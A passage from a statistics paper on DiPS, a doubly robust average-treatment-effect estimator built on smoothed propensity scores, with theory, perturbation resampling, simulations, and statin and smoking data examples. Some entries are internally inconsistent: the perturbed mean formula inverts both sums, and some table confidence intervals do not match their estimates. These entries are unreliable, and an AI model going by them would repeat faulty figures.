Beyond this usual form of double-robustness, if the PS model specification \eqref{e:psmod} is incorrect, we expect the calibration step to at least partially correct for the misspecfication since, in large samples, given $\mathbf{x}$, $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)$ is closer to the true $\pi_k(\mathbf{x})$ than the misspecified parametric model $g_{\pi}(\bar{\alpha}_0+\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x})$. In some specific scenarios, the calibration can completely overcome the misspecification of the PS model. For example,
let $\widetilde{\mathcal{M}}_{\pi}$ denote a model for $\mathbb P$ under which:
\begin{align*}
\pi_1(\mathbf{x}) = \widetilde{g}_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x})
\end{align*}
for some \emph{unknown} link function $\widetilde{g}_{\pi}(\cdot)$ and unknown $\boldsymbol\alpha \in\mathbb{R}^{p}$, \emph{and} $\mathbf{X}$ are known to be elliptically distributed such that $\mathbb E(\boldsymbol a^{\sf \tiny T}\mathbf{X}\mid \boldsymbol\alpha_*^{\sf \tiny T}\mathbf{X})$ exists and is linear in $\boldsymbol\alpha_*^{\sf \tiny T}\mathbf{X}$, where $\boldsymbol\alpha_*$ denotes the true $\boldsymbol\alpha$ (e.g. if $\mathbf{X}$ is multivariate normal). Then, using the results of \cite{li1989regression}, it can be shown that $\bar{\boldsymbol\alpha}=c\boldsymbol\alpha_*$ for some scalar $c$. But since $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$ recovers $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)=\mathbb P(T=k\mid\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$ asymptotically, it also recovers $\pi_k(\mathbf{x})$ under $\widetilde{\Mscr}_{\pi}$. Consequently, $\widehat{\Delta}$ is more than doubly-robust in that $\widehat{\Delta}-\Delta = O_p(n^{-1/2})$ under the larger model $\mathcal{M}_{\pi}\cup \widetilde{\Mscr}_{\pi}\cup\mathcal{M}_{\mu}$.
The same phenomenon also occurs when estimating $\boldsymbol\beta_k$ under misspecification of the link in \eqref{e:ormod}, if we do not assume $\boldsymbol\beta_0=\boldsymbol\beta_1$ and use a common model to estimate the $\boldsymbol\beta_k$'s. In this case, if $\widetilde{\Mscr}_{\mu}$ is an analogous model under which:
\begin{align*}
\mu_1(\mathbf{x}) = \widetilde{g}_{\mu,1}(\boldsymbol\beta_1^{\sf \tiny T}\mathbf{x}) \quad \text{ and } \quad \mu_0(\mathbf{x})=\widetilde{g}_{\mu,0}(\boldsymbol\beta_0^{\sf \tiny T}\mathbf{x})
\end{align*}
for some unknown link functions $\widetilde{g}_{\mu,0}(\cdot)$ and $\widetilde{g}_{\mu,1}(\cdot)$ and $\mathbf{X}$ are elliptically distributed, then $\widehat{\Delta}-\Delta = O_p(n^{-1/2})$ under the even larger model $\mathcal{M}_{\pi}\cup \widetilde{\Mscr}_{\pi} \cup \mathcal{M}_{\mu}\cup \widetilde{\Mscr}_{\mu}$. This does not hold when $\boldsymbol\beta_0=\boldsymbol\beta_1$ is assumed, as $T$ is binary so $(T,\mathbf{X}^{\sf \tiny T})^{\sf \tiny T}$ is not exactly elliptically distributed. But the result may still be expected to hold approximately when $\mathbf{X}$ is elliptically distributed.
\subsection{Efficiency}
In terms efficiency,
let the terms contributed to the influence function for $\widehat{\Delta}$ when $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ are known be:
\begin{align}
\varphi_{i,k} = \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}-1\right\}\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i =k ) -\bar{\mu}_k.
\end{align}
Under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$, $\varphi_{i,k}$ is the full influence function for $\widehat{\Delta}$. This influence function is the efficient influence function for $\Delta^*$ under $\mathcal{M}_{np}$ since $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i=k)=\mu_k(\mathbf{x})$ and $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)=\pi_k(\mathbf{x})$ for all $\mathbf{x}\in\mathcal{X}$ at distributions for $\mathbb P$ belonging to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$. An important consequence of this is that $\widehat{\Delta}$ reaches the semiparametric efficiency bound under $\mathcal{M}_{np}$, at distributions belonging to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$. That is, $\widehat{\Delta}$ is also a \emph{locally semiparametric efficient} estimator under $\mathcal{M}_{np}$.
In addition, based on the same arguments as in the preceding subsection, the local efficiency property could potentially be broadened so that $\widehat{\Delta}$ is locally efficient at distributions for $\mathbb P$ belonging to $(\mathcal{M}_{\pi} \cup \widetilde{\Mscr}_{\pi})\cap (\mathcal{M}_{\mu} \cup \widetilde{\Mscr}_{\mu})$.
Beyond this characterization of efficiency similar to that of $\widehat{\Delta}_{dr}$, there are additional benefits of $\widehat{\Delta}$ under model $\mathcal{M}_{\pi}\cap \mathcal{M}_{\mu}^c$. In this case, akin to $\widehat{\Delta}_{dr}$, estimating $\boldsymbol\beta_k$ does not contribute to the asymptotic variance since $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}=\boldsymbol 0$, and a similar $n^{1/2}\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}}$ term is contributed from estimating $\boldsymbol\alpha$. The analogous term in the expansion for $\widehat{\Delta}_{dr}$ contributes the negative of a projection of the preceding terms onto the space of the linear span of the scores for $\boldsymbol\alpha$ (restricted to $\mathcal{A}_{\boldsymbol\alpha}$) to its influence function. We show in Web Appendix D the same interpretation can be adopted for $\widehat{\Delta}$.
\begin{theorem} \label{t:effgain}
Let $\mathbf{U}_{\boldsymbol\alpha}$ be the score for $\boldsymbol\alpha$ under $\mathcal{M}_{\pi}$ and let $[\mathbf{U}_{\boldsymbol\alpha,\mathcal{A}_{\boldsymbol\alpha}}]$ denote the linear span of its components indexed in $\mathcal{A}_{\boldsymbol\alpha}$. In the Hilbert space of random variables with mean $0$ and finite variance $\mathcal{L}_2^0$ with inner product given by the covariance, let $\Pi\{ V \mid \mathcal{S}\}$ denote the projection of some $V\in \mathcal{L}_2^0$ into a subspace $\mathcal{S} \subseteq \mathcal{L}_2^0$. If the assumptions required for Theorem \ref{t:IFexp} hold
, under $\mathcal{M}_{\pi}$, $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T} n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} = -n^{-1/2}\sum_{i=1}^n\Pi\{\varphi_{i,k}\mid[\mathbf{U}_{\boldsymbol\alpha,\mathcal{A}_{\boldsymbol\alpha}}]\} + o_p(1)$.
\end{theorem}
This result implies through the Pythagorean theorem the familiar efficiency paradox that under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$, $\widehat{\Delta}$ would be more efficient if $\boldsymbol\alpha$ were estimated, even if the true $\boldsymbol\alpha$ were known \citep{lunceford2004stratification}. Moreover, under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$, the influence function of $\widehat{\Delta}$ involves projecting
$\varphi_{i,k}$ rather than:
\begin{align*}
\phi_{i,k} = \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i)}-1\right\}g_{\mu}(\bar{\beta}_{0} + \bar{\beta}_1 k+\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i) -\bar{\mu}_{k},
\end{align*}
which are the preceding influence function terms for $\widehat{\Delta}_{dr}$. But since $\mathbb E(Y_i\mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i =k)$ better approximates $\mu_k(\mathbf{x})$ than the limiting parametric model $g_{\mu}(\bar{\beta}_0 + \bar{\beta}_1 k +\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$, it can be shown that $\mathbb E(\phi_{i,k}^2)>\mathbb E(\varphi_{i,k}^2)$ for $k=0,1$. Given that under $\mathcal{M}_{\pi}\cap \mathcal{M}_{\mu}^c$ the influence function for both $\widehat{\Delta}$ and $\widehat{\Delta}_{dr}$ are then in the form of a residual after projecting $\varphi_{i,k}$ and $\phi_{i,k}$ onto the same space, the asymptotic variance of $\widehat{\Delta}$ can be seen to be less than $\widehat{\Delta}_{dr}$. That is, $\widehat{\Delta}$ is more efficient than $\widehat{\Delta}_{dr}$ under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$.
We show in the simulation studies that this improvement can lead to substantial efficiency gains under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$ in finite samples. These robustness and efficiency properties distinguish $\widehat{\Delta}$ from the usual doubly-robust estimators and their variants. Moreover, despite being motivated by data with high-dimensional $p$, these properties still hold if $p$ is small relative to $n$, which makes $\widehat{\Delta}$ effective in low-dimensional settings as well.
We next consider a perturbation scheme to estimate standard errors (SE) and confidence intervals (CI) for $\widehat{\Delta}$.
\section{Perturbation Resampling} \label{s:perturbation}
Although the asymptotic variance of $\widehat{\Delta}$ can be determined through its influence function specified in Theorem \eqref{t:IFexp}, a direct empirical estimate based on the influence function is difficult because $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}$ and $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}$ involve complicated functionals of $\mathbb P$ that are difficult to estimate. Instead we propose a simple perturbation-resampling procedure. Let $\mathcal{G} = \{ G_i : i=1,\ldots,n\}$ be a set of non-negative iid random variables with unit mean and variance that are independent of $\mathscr{D}$. The procedure then perturbs each ``layer'' of the estimation of $\widehat{\Delta}$. Let the perturbed estimates of $\vec{\balph}$ and $\vec{\boldsymbol\beta}$ be:
\begin{align*}
&(\widehat{\alpha}^*_0,\widehat{\balph}^{*\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\balph}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i)G_i + p_{\pi}(\vec{\balph}_{\{-1\}}; \lambda_{n})\right\} \\
&(\widehat{\beta}^*_0,\widehat{\beta}^*_1,\widehat{\boldsymbol\beta}^{*\sf \tiny T}_0,\widehat{\boldsymbol\beta}^{*\sf \tiny T}_1)^{\sf \tiny T} = \argmin_{\vec{\boldsymbol\beta}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i)G_i + p_{\mu}(\vec{\boldsymbol\beta}_{\{-1\}};\lambda_{n})\right\}.
\end{align*}
The perturbed DiPS estimates are calculated by:
\begin{align}
\widehat{\pi}_k^*(\mathbf{x};\widehat{\boldsymbol\theta}_k^*)= \frac{\sum_{j=1}^nK_h\{(\widehat{\balph}^*,\widehat{\boldsymbol\beta}_k^*)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}I(T_j=k)G_j}{\sum_{j=1}^n K_h\{(\widehat{\balph}^*,\widehat{\boldsymbol\beta}_k^*)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}G_j}, \text{ for } k=0,1.
\end{align}
Lastly the perturbed estimator is given by $\widehat{\Delta}^* = \widehat{\mu}_1^* - \widehat{\mu}_0^*$ where:
\begin{align*}
\widehat{\mu}_k^* = \left\{ \sum_{i=1}^n \frac{I(T_i = k)}{\widehat{\pi}_k^*(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k^*)}G_i\right\}^{-1}\left\{ \sum_{i=1}^n \frac{I(T_i = k)Y_i}{\widehat{\pi}_k^*(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k^*)} G_i\right\}^{-1}, \text{ for } k=0,1.
\end{align*}
It can be shown based on arguments similar to those in \cite{tian2007model} that the asymptotically distribution of $n^{1/2}(\widehat{\Delta} - \bar{\Delta})$ coincides with that of $n^{1/2}(\widehat{\Delta}^* - \widehat{\Delta}) \mid \mathscr{D}$. We can thus approximate the SE of $\widehat{\Delta}$ based on the empirical standard deviation or, as a robust alternative, the empirical mean absolute deviations (MAD) of a large number of resamples $\widehat{\Delta}^*$ and construct CI's using empirical percentiles of resamples of $\widehat{\Delta}^*$.
\section{Numerical Studies} \label{s:numerical}
\subsection{Simulation Study}
We performed extensive simulations to assess the finite sample bias and relative efficiency (RE) of $\widehat{\Delta}$ (DiPS) compared to alternative estimators. We also assessed in a separate set of simulations the performance of the perturbation procedure.
Adaptive LASSO was used to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$, and a Gaussian product kernel of order $q=4$ with a plug-in bandwidth at the optimal order (see \hyperref[s:discussion]{Discussion}) was used for smoothing. Alternative estimators include an IPW with $\pi_k(\mathbf{x})$ estimated by adaptive LASSO (ALAS), $\widehat{\Delta}_{dr}$ (DR-ALAS) with nuisances estimated by adaptive LASSO, the DR estimator with nuisance functions estimated by ``rigorous'' LASSO (DR-rLAS) of \cite{belloni2017program}, outcome-adaptive LASSO (ALS) of \cite{shortreed2017outcome}, Group Lasso and Doubly Robust Estimation (GLiDeR) of \cite{koch2017covariate}, and model average double robust (MADR) of \cite{cefalu2017model}. ALS and GLiDeR were implemented with default settings from code provided in the Supplementary Materials of the respective papers. DR-rLAS was implemented using the \texttt{hdm} R package \citep{chernozhukov2016hdm} with default settings, and MADR was implemented using the \texttt{madr} package with $M=500$ MCMC iterations to reduce the computations. Throughout the numerical studies, unless noted otherwise, we postulated $g_{\pi}(u)=1/(1+e^{-u})$ for $\mathcal{M}_{\pi}$ and $g_{\mu}(u)=u$ with $\boldsymbol\beta_0=\boldsymbol\beta_1$ for $\mathcal{M}_{\mu}$ as the working models. For adaptive LASSO, the tuning parameter was chosen by an extended regularized information criteria \citep{hui2015tuning}, which showed good performance for variable selection. We re-fitted models with selected covariates as suggested in \cite{hui2015tuning} to reduce bias.
We focused on a continuous outcome in the simulations, generating the data according to:
\begin{align*}
\mathbf{X} \sim N(\boldsymbol 0,\Sigma), \quad T\mid \mathbf{X} \sim Ber\{ \pi_1(\mathbf{X})\}, \quad \text{ and } Y\mid \mathbf{X},T \sim N\{ \mu_T(\mathbf{X}), 10^2\},
\end{align*}
where $\Sigma = (\sigma^2_{ij})$ with $\sigma^2_{ij} = 1$ if $i=j$ and $\sigma^2_{ij} = .4(.5)^{\abs{i-j}/3} I(\abs{i-j} \leq 15)$ if $i\neq j$. The simulations were varied over scenarios where working models were correct or misspecified:
\begin{align*}
&\text{Both correct: } \pi_1(\mathbf{x}) = g_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \quad \mu_k(\mathbf{x}) = k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x} \\
&\text{Misspecified $\mu_k(\mathbf{x})$: } \pi_1(\mathbf{x}) = g_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \quad \mu_k(\mathbf{x}) = k + 3\left\{ \boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x} (\boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x}+3)\right\}^{1/3} \\
&\text{Misspecified $\pi_k(\mathbf{x})$: } \pi_1(\mathbf{x}) = g_{\pi}\left\{-1+\boldsymbol\alpha_1^{\sf \tiny T}\mathbf{x}(.5\boldsymbol\alpha_2^{\sf \tiny T}\mathbf{x} + .5)\right\}, \quad \mu_k(\mathbf{x}) = k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x} \\
&\text{Both misspecified: } \pi_1(\mathbf{x}) = g_{\pi}\left\{-1+\boldsymbol\alpha_1^{\sf \tiny T}\mathbf{x}(.5\boldsymbol\alpha_2^{\sf \tiny T}\mathbf{x} + .5)\right\}, \quad \mu_k(\mathbf{x}) = k + 3\left\{ \boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x} (\boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x}+3)\right\}^{1/3},
\end{align*}
where $\boldsymbol\alpha = (.4,-.3,.4,\mathbf{.3}_{2},.4,.3,-\mathbf{.3}_{3},\boldsymbol 0_{p-10})^{\sf \tiny T}$, $\boldsymbol\beta_0=\boldsymbol\beta_1=(-1,1,-1,\mathbf{1}_2,-1,\mathbf{1}_2,-\mathbf{1}_2,\boldsymbol 0_{p-10})^{\sf \tiny T}$, $\boldsymbol\alpha_{1} = (.9,0,-.9,0,.9,0,.9,0,-.9,0,\boldsymbol 0_{p-10})^{\sf \tiny T}$, and $\boldsymbol\alpha_{2} = (0,-.6,0,.6,0,.6,0,-.6,0,-.6,\boldsymbol 0_{p-10})^{\sf \tiny T}$, with $\mathbf{a}_{m}$ denoting a $1\times m$ vector that has all its elements as $a$. In the misspecified $\mu_k(\mathbf{x})$ scenario, $\mu_k(\mathbf{x})$ is actually a single-index model among subjects with either $T=1$ or $T=0$, which allows for complex nonlinearities and interactions. Nevertheless, this is a genuine misspecification of $\mu_k(\mathbf{x})$ (i.e. $\mathbb P$ would \emph{not} belong to $\widetilde{\Mscr}_{\mu}\cup \mathcal{M}_{\mu}$) because we assumed $\boldsymbol\beta_0=\boldsymbol\beta_1$ for $\mathcal{M}_{\mu}$. A double-index model is used for misspecifying $\pi_k(\mathbf{x})$ so that we consider when $\mathbb P$ would not belong to $\widetilde{\Mscr}_{\pi}\cup\mathcal{M}_{\pi}$. The simulations were run over $R=2,000$ repetitions.
Table \ref{tab:bias} presents the bias and root mean square error (RMSE) for $n=1,000, 5,000$ under the different specifications when $p=15$. Among the four scenarios considered, the bias for DiPS is small relative to the RMSE and generally diminishes to zero as $n$ increases, verifying its double-robustness. In contrast, IPW-ALAS and OAL rely on consistent estimates of the PS and show non-negligible bias under the ``misspecified $\pi_1(\mathbf{x})$'' scenario. The extra robustness of DiPS is evident under the ``both misspecified'' scenario, where most other estimators incur non-negligible bias. As the true outcome model is close to being a single-index model with elliptical covariates, DiPS still estimates the averate treatment effect $\Delta$ with little bias. In results not shown, we also checked the bias for $p$ up to $p=75$, where we generally found similar patterns. DiPS incurred around 1-2\% more bias than other estimators when $n$ was small relative to $p$, which may be a consequence of smoothing in finite samples.
\begin{table}[htbp]
\scalebox{0.86}{
\begin{tabular}{rrcccccccc}
\toprule
& & \multicolumn{2}{c}{Both Correct} & \multicolumn{2}{c}{Misspecified $\mu_k(\mathbf{x})$} & \multicolumn{2}{c}{Misspecified $\pi_1(\mathbf{x})$} & \multicolumn{2}{c}{Both misspecified} \\
\multicolumn{1}{c}{\textbf{Size}} & \multicolumn{1}{c}{\textbf{Estimator}} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} \\ \hline
\multicolumn{1}{c}{\multirow{7}[2]{*}{n=1,000}} & \multicolumn{1}{c}{IPW-ALAS} & 0.009 & 0.279 & 0.001 & 0.414 & -0.117 & 0.312 & -0.019 & 0.434 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-ALAS} & -0.002 & 0.252 & -0.014 & 0.401 & 0.003 & 0.244 & 0.102 & 0.462 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-rLAS} & -0.057 & 0.275 & -0.092 & 0.426 & -0.022 & 0.284 & 0.021 & 0.438 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{OAL} & 0.002 & 0.263 & -0.013 & 0.403 & 0.013 & 0.283 & 0.109 & 0.459 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{GLiDeR} & -0.002 & 0.244 & -0.016 & 0.379 & 0.004 & 0.239 & 0.092 & 0.426 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{MADR} & -0.002 & 0.249 & -0.015 & 0.402 & 0.002 & 0.239 & 0.101 & 0.451 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DiPS} & 0.015 & 0.252 & 0.003 & 0.293 & 0.017 & 0.243 & -0.003 & 0.293 \\ \hline
\multicolumn{1}{c}{\multirow{7}[2]{*}{n=5,000}} & \multicolumn{1}{c}{IPW-ALAS} & -0.003 & 0.116 & 0.001 & 0.186 & -0.127 & 0.181 & -0.033 & 0.192 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-ALAS} & -0.003 & 0.110 & 0.002 & 0.184 & 0.000 & 0.107 & 0.093 & 0.216 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-rLAS} & -0.003 & 0.110 & 0.002 & 0.184 & 0.037 & 0.122 & 0.252 & 0.320 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{OAL} & -0.002 & 0.115 & 0.002 & 0.186 & -0.098 & 0.155 & 0.012 & 0.193 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{GLiDeR} & -0.003 & 0.108 & 0.001 & 0.180 & 0.000 & 0.108 & 0.098 & 0.217 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{MADR} & -0.003 & 0.110 & 0.002 & 0.184 & 0.000 & 0.107 & 0.094 & 0.217 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DiPS} & 0.005 & 0.109 & 0.008 & 0.117 & 0.005 & 0.106 & -0.002 & 0.118 \\
\bottomrule
\end{tabular}
}
\vspace{1.5em}
\caption{Bias and RMSE of estimators by $n$ and model specification scenario.
}
\label{tab:bias}
\end{table}
Figure \ref{fig:RE} presents the RE under the different scenarios for $n=1,000, 5,000$ and $p=15,30,75$. RE was defined as the mean square error (MSE) of DR-ALAS relative to that of each estimator, with RE $>1$ indicating greater efficiency compared to DR-ALS. Under the ``both correct'' scenario many of the estimators have similar efficiency since they are variants of the doubly-robust estimator and are locally semiparametric efficient. DiPS is also no less efficient than other estimators under the ``misspecified $\pi_k(\mathbf{x})$'' scenario. On the other hand, efficiency gains of more than 100\% are achieved relative to other estimators when $n$ is large relative to $p$, under the ``misspecified $\mu_k(\mathbf{x})$'' scenario. This demonstrates that the efficiency gain resulting from Theorem \ref{t:effgain} can be substantial. The gains diminish with larger $p$ for a fixed $n$ as expected but remain substantial even when $p=75$. Similar results occur under the ``both misspecified'' scenario, except that the efficiency gains for DiPS are even larger due its robustness to misspecification in terms of the bias.
\begin{figure}[h!]
\centering
\centerline{(a) Both correct}
\includegraphics[scale=.32]{fig1_a.png}
\includegraphics[scale=.32]{fig1_b.png}
\centerline{(b) Misspecified $\mu_k(\mathbf{x})$}
\includegraphics[scale=.32]{fig1_c.png}
\includegraphics[scale=.32]{fig1_d.png}
\centerline{(c) Misspecified $\pi_1(\mathbf{x})$}
\includegraphics[scale=.32]{fig1_e.png}
\includegraphics[scale=.32]{fig1_f.png}
\centerline{(d) Misspecified both}
\includegraphics[scale=.32]{fig1_g.png}
\includegraphics[scale=.32]{fig1_h.png}
\caption{\baselineskip=1pt RE relative to DR-ALAS by $n$, $p$, and specification scenario.
}
\label{fig:RE}%
\end{figure}
Table \ref{tab:cov} presents the performance of perturbation for DiPS when $p=15$. SEs for DiPS were estimated using the MAD. The empirical SEs (Emp SE), calculated from the sample standard deviations of $\widehat{\Delta}$ over the simulation repetitions, were generally similar to the average of the SE estimates over the repetitions (ASE), despite some under slight underestimation.
The coverage of the percentile CI's (Cover) were generally close to nominal 95\%, with slight over-coverage in small samples that diminished with larger $n$.
\begin{table}[htbp]
\begin{tabular}{ccccc}
\toprule
\textbf{p} & \textbf{n} & \textbf{Emp SE} & \textbf{ASE} & \textbf{Cover} \\
\midrule
15 & 500 & 0.350 & 0.326 & 0.971 \\
15 & 1000 & 0.248 & 0.228 & 0.956 \\
15 & 2000 & 0.170 & 0.161 & 0.954 \\ \hline
30 & 500 & 0.351 & 0.330 & 0.973 \\
30 & 1000 & 0.248 & 0.230 & 0.963 \\
30 & 2000 & 0.174 & 0.161 & 0.950 \\
\bottomrule
\end{tabular}
\vspace{1.5em}
\caption{Perturbation performance under correctly specified models. Emp SE: empirical standard error over simulations, ASE: average of standard error estimates based on MAD over perturbations, Cover: Coverage of 95\% percentile intervals.}
\label{tab:cov}
\end{table}
\subsection{Data Example: Effect of Statins on Colorectal Cancer Risk in EMRs}
We applied DiPS to assess the effect of statins, a medication for lowering cholesterol levels, on the risk of colorectal cancer (CRC) among patients with inflammatory bowel disease (IBD) identified from EMRs of a large metropolitan healthcare provider. Previous studies have suggested that the use of statins have a protective effect on CRC \citep{liu2014association}, but few studies have considered the effect among IBD patients. The EMR cohort consisted of $n=10,817$ IBD patients, including 1,375 statin users. CRC status and statin use were ascertained by the presence of ICD9 diagnosis and electronic prescription codes. We adjusted for $p=15$ covariates as potential confounders, including age, gender, race, smoking status, indication of elevated inflammatory markers, examination with colonoscopy, use of biologics and immunomodulators, subtypes of IBD, disease duration, and presence of primary sclerosing cholangitis (PSC).
For the working model $\mathcal{M}_{\mu}$, we specified $g_{\mu}(u)=1/(1+e^{-u})$ to accomodate the binary outcome. SEs for other estimators were obtained from the MAD over bootstrap resamples, except for DR-rLAS, which is obtained directly from the bootstrap procedure implemented in \texttt{hdm}. CIs were calculated from percentile intervals, except for DR-rLAS, which were based on normal approximation. We also calculated a two-sided p-value from a Wald test for the null that statins have no effect, using the point and SE estimates for each estimator. The unadjusted estimate (None) based on difference in means by groups was also calculated as a reference. The left side of Table \ref{tab:data} shows that, without adjustment, the naive risk difference is estimated to be -0.8\% with a SE of 0.4\%. The other methods estimated that statins had a protective effect ranging from around -1\% to -3\% after adjustment for covariates. DiPS and DR-rLAS were the most efficient estimators, with DiPS achieving estimated variance that ranged from at least 13\% to more than 100\% lower than that of other estimators.
\begin{table}
\centering
\scalebox{0.85}{
\begin{tabular}{ccccccccc}
\toprule
\multicolumn{5}{c}{IBD EMR Study} & \multicolumn{4}{c}{FOS} \\
& \textbf{Est} & \textbf{SE} & \textbf{95\% CI} & \textbf{p-val} & \textbf{Est} & \textbf{SE} & \textbf{95\% CI} & \textbf{p-val} \\ \hline
None & -0.008 & 0.004 & (-0.017, 0) & 0.054 & 0.180 & 0.061 & (0.07, 0.291) & 0.003 \\
IPW-ALAS & -0.022 & 0.004 & (-0.03, -0.015) & $<$0.001 & 0.182 & 0.061 & (0.057, 0.299) & 0.003 \\
DR-ALAS & -0.020 & 0.005 & (-0.028, -0.012) & $<$0.001 & 0.140 & 0.063 & (0.038, 0.276) & 0.025 \\
DR-rLAS & -0.008 & 0.003 & (-0.015, -0.002) & 0.011 & 0.175 & 0.057 & (0.063, 0.288) & 0.002 \\
OAL & -0.031 & 0.004 & (-0.017, 0) & $<$0.001 & 0.147 & 0.062 & (0.062, 0.289) & 0.018 \\
GLiDeR & -0.018 & 0.005 & (-0.04, -0.022) & $<$0.001 & 0.128 & 0.053 & (0.035, 0.254) & 0.015 \\
MADR & -0.030 & 0.005 & (-0.041, -0.022) & $<$0.001 & 0.142 & 0.058 & (0.036, 0.253) & 0.015 \\
DiPS & -0.024 & 0.003 & (-0.03, -0.015) & $<$0.001 & 0.141 & 0.053 & (0.046, 0.272) & 0.008 \\
\bottomrule
\end{tabular}
}
\vspace{1.5em}
\caption{Data example on the effect of statins on CRC risk in EMR data and the effect of smoking on logCRP in FOS data. Est: Point estimate, SE: estimated SE, 95\% CI: confidence interval, p-val: p-value from Wald test of no effect.
}
\label{tab:data}
\end{table}
\subsection{Data Example: Framingham Offspring Study}
The Framingham Offspring Study (FOS) is a cohort study initiated in 1971 that enrolled 5,124 adult children and spouses of the original Framingham Heart Study. The study collected data over time on participants' medical history, physician examination, and laboratory tests to examine epidemiological and genetic risk factors of cardiovascular disease (CVD). A subset of the FOS participants also have their genotype from the Affymetrix 500K SNP array available through the Framingham SNP Health Association Resource (SHARe) on dbGaP. We were interested in assessing the effect of smoking on C-reactive protein (CRP), an inflammation marker highly predictive of CVD risk, while adjusting for potential confounders including gender, age, diabetes status, use of hypertensive medication, systolic and diastolic blood pressure measurements, and HDL and total cholesterol measurements, as well as a large number of SNPs in gene regions previously reported to be associated with inflammation or obesity. While the inflmmation-related SNPs are not likely to be associated with smoking, we include them as efficiency covariates since they are likely to be related with CRP. SNPs that had missing values in $>1\%$ of the sample as well as SNPs that had a correlation $>.99$ with other SNPs in the data were removed from the covariates. A small proportion of individuals who still had missing values in SNPs had their values imputed by the mean value. The analysis includes $n=1,892$ individuals with available information on the CRP and the $p=121$ covariates, of which 113 were SNPs.
Since CRP is heavily skewed, we applied a log transformation so that the linear regression model in $\mathcal{M}_{\mu}$ better fits the data. SEs, CIs, and p-values were calculated in the same way as in the above example. The right side of Table \ref{tab:data} shows that different methods agree that smoking significantly increases logCRP. In general, point estimates tended to attenuate after adjusting for covariates since smokers are likely to have other characteristics that increase inflammation. DiPS and GliDeR were among the most efficient, with DiPS achieving up to 39\% lower estimated variance than other estimators.
